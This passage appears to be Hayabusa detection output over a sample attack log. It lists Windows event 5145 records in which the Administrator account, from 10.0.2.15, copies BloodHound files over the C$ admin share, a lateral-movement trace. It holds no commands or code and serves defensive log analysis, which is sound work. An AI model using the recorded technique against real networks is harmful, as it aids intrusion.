\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-stream : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\conf : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\build : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\client : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es6 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es7 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\array : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\date : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\dom-collections : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\error : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\function : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\math : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\number : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\object : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\promise : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\reflect : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\regexp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\set : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\string : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\symbol : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\system : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\typed : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-set : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es6 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es7 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\fn : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\stage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\web : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules\library : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\stage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\web : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : 
Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\order : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\position : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\rank : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\class : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: 